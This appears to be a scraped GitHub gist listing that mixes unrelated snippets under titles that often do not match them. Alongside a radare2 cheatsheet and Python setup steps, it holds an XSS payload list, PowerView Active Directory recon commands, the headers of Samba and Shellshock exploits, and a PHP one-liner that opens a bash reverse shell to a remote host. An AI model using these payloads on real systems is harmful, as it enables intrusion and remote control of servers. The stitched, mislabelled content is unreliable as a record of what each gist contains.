load without any analysis (file header at offset 0x0): r2 -n /path/to/file
- analyze all:
aa - show sections:
iS - list functions:
afl - list imports:
ii - list entrypoints:
ie - seek to function:
s sym.main
iamtutu iamtutu
IamAdiSri
/ Python3, Pip3, Virtualenv and Virtualenvwrapper Setup
Last active
May 9, 2022 22:08
— forked from evansneath/Python3 Virtualenv Setup
Setting up and using Python3, Pip3, Virtualenv (for Python3) and Virtualenvwrapper (for Python3)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| First install pip for Python2. Download the get-pip.py file from https://bootstrap.pypa.io/get-pip.py | |
| $ cd <download location> | |
| $ sudo -H python ./get-pip.py | |
| Installing pip also installs Python3 | |
| To run Python3 | |
| $ python3 | |
| Install pip3 by just executing the same file as in the step above, but this time using Python3 | |
| $ sudo -H python3 ./get-pip.py |
williballenthin
/ yet another radare2 cheatsheet.md
Last active
April 9, 2025 20:30
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> | |
| '';!--"<XSS>=&{()} | |
| 0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-" | |
| <script/src=data:,alert()> | |
| <marquee/onstart=alert()> | |
| <video/poster/onerror=alert()> | |
| <isindex/autofocus/onfocus=alert()> | |
| <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> | |
| <IMG SRC="javascript:alert('XSS');"> | |
| <IMG SRC=javascript:alert('XSS')> |
perrygeo
/ base64_padding.md
Last active
January 21, 2025 15:04
Avoiding TypeError: Incorrect padding with Python's base64 encoding
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # NOTE: the most updated version of PowerView (http://www.harmj0y.net/blog/powershell/make-powerview-great-again/) | |
| # has an updated tricks Gist at https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993 | |
| # get all the groups a user is effectively a member of, 'recursing up' | |
| Get-NetGroup -UserName <USER> | |
| # get all the effective members of a group, 'recursing down' | |
| Get-NetGroupMember -GoupName <GROUP> -Recurse | |
| # get the effective set of users who can administer a server |
kizbitz
/ dockerhub-v2-api-user.sh
Last active
April 17, 2023 23:30
Get the list of images and tags for a Docker Hub user account.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # Example for the Docker Hub V2 API | |
| # Returns all imagas and tags associated with a Docker Hub user account. | |
| # Requires 'jq': https://stedolan.github.io/jq/ | |
| # set username and password | |
| UNAME="" | |
| UPASS="" |
worawit
/ cve-2015-0240_samba_exploit.py
Created
April 10, 2015 14:48
Exploit for Samba vulnerabilty (CVE-2015-0240)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| """ | |
| Exploit for Samba vulnerabilty (CVE-2015-0240) by sleepya | |
| The exploit only targets vulnerable x86 smbd <3.6.24 which 'creds' is controlled by | |
| ReferentID field of PrimaryName (ServerName). That means '_talloc_zero()' | |
| in libtalloc does not write a value on 'creds' address. | |
| Reference: | |
| - https://securityblog.redhat.com/2015/02/23/samba-vulnerability-cve-2015-0240/ |
honkskillet
/ byte-sizetuts.md
Last active
August 22, 2024 14:19
A series of golang tutorials with youtube videos.
by alexander white ©
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/python | |
| # Exploit Title: Shellshock SMTP Exploit | |
| # Date: 10/3/2014 | |
| # Exploit Author: fattymcwopr | |
| # Vendor Homepage: gnu.org | |
| # Software Link: http://ftp.gnu.org/gnu/bash/ | |
| # Version: 4.2.x < 4.2.48 | |
| # Tested on: Debian 7 (postfix smtp server w/procmail) | |
| # CVE : 2014-6271 | |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| exec("/bin/bash -c 'bash -i >& /dev/tcp/10.0.0.10/1234 0>&1'"); |